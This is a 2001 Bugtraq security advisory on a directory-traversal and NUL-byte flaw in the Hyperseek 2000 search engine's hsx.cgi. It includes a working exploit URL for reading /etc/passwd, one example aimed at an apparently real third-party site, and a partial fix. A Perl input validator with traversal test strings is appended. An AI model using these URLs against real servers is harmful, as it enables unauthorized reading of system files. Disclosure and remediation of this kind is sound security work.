[18844] in bugtraq


Hyperseek 2000 Search Engine - "show directory & files" bug

daemon@ATHENA.MIT.EDU (MC GaN)
Mon Jan 29 03:03:05 2001

Mime-Version: 1.0
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 8bit
Message-Id:  <E14MmGa-0001iD-00@f11.mail.ru>
Date:         Sun, 28 Jan 2001 10:28:52 +0300
Reply-To: MC GaN <vipersv@mail.ru>
From: MC GaN <vipersv@MAIL.RU>
To: BUGTRAQ@SECURITYFOCUS.COM

              --== NerF security gr0up advisory ==--
--------------------------------------------------------------------
Hyperseek 2000 Search Engine - "show directory & files" bug.
--------------------------------------------------------------------

1. A standard Perl problem in the statistics module, file hsx.cgi: the script does not filter ../ and %00. Through this bug you can remotely read any file and list directories. ../ moves one directory up; %00 is the URL-encoded NUL byte, which marks the end of the string.

2. Exploit url:
http://www.victim.ru/cgi-bin/hsx.cgi?show=../../../../../../etc/passwd%00
Note: directory can change and amount of ../ can vary.

3. Example:
http://www.netsurprise.de/cgi-bin/suche/hsx.cgi?show=../../../../../../../etc/passwd%00

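4. Fix: filter these symbols out of the input, for example the NUL byte:
$dat =~ s/\0//g;   # strip NUL bytes from the parameter
Note: this line removes only the NUL byte; the ../ sequences named in point 1 have to be filtered as well.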

--------------------------------------------------------------------
NerF security gr0up (Russia) - www.nerf.f2s.com
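
A stricter form of the filtering in point 4, as an added example (not code from the advisory or from Hyperseek): instead of stripping characters, it rejects any "show" value that contains a NUL byte or is not a plain file name, then confirms that the resolved path stays inside the statistics directory. The function name resolve_show, the single-directory layout and the sample file are assumptions made for this example.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use Cwd qw(realpath);
use File::Spec;
use File::Temp qw(tempdir);

# Hypothetical validator for the "show" parameter of a statistics CGI.
# Returns the resolved path if it is a plain file inside $base, else undef.
sub resolve_show {
    my ($show, $base) = @_;
    return undef unless defined $show && length $show;
    return undef if $show =~ /\0/;    # reject NUL outright, do not strip it
    # Allow-list: one file name, no slashes, no leading dot.
    return undef unless $show =~ /\A[A-Za-z0-9_][A-Za-z0-9_.-]*\z/;
    my $root = realpath($base);
    return undef unless defined $root;
    my $full = realpath(File::Spec->catfile($root, $show));
    return undef unless defined $full && -f $full;
    # realpath resolves symlinks, so this prefix test is on the real location.
    return undef unless index($full, "$root/") == 0;
    return $full;
}

# Constructed test data: a temporary statistics directory with one report.
my $base = tempdir(CLEANUP => 1);
open(my $fh, '>', "$base/jan2001.dat") or die "create: $!";
print {$fh} "hits=42\n";
close $fh;

# Constructed inputs: one legitimate name, then traversal and NUL variants.
my @cases = (
    ['jan2001.dat',               1],
    ["../../../../etc/passwd\0",  0],
    ['../../etc/passwd',          0],
    ["jan2001.dat\0.html",        0],
    ['/etc/passwd',               0],
);
for my $c (@cases) {
    my ($input, $expect) = @$c;
    my $got = defined resolve_show($input, $base) ? 1 : 0;
    (my $shown = $input) =~ s/\0/\\0/g;    # make NUL visible in the output
    printf "%-28s %s\n", $shown, $got ? 'served' : 'rejected';
    die "unexpected result for $shown\n" unless $got == $expect;
}
```

Rejecting the request is safer than stripping the byte, because a stripped value still reaches the file open with whatever traversal it carried.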
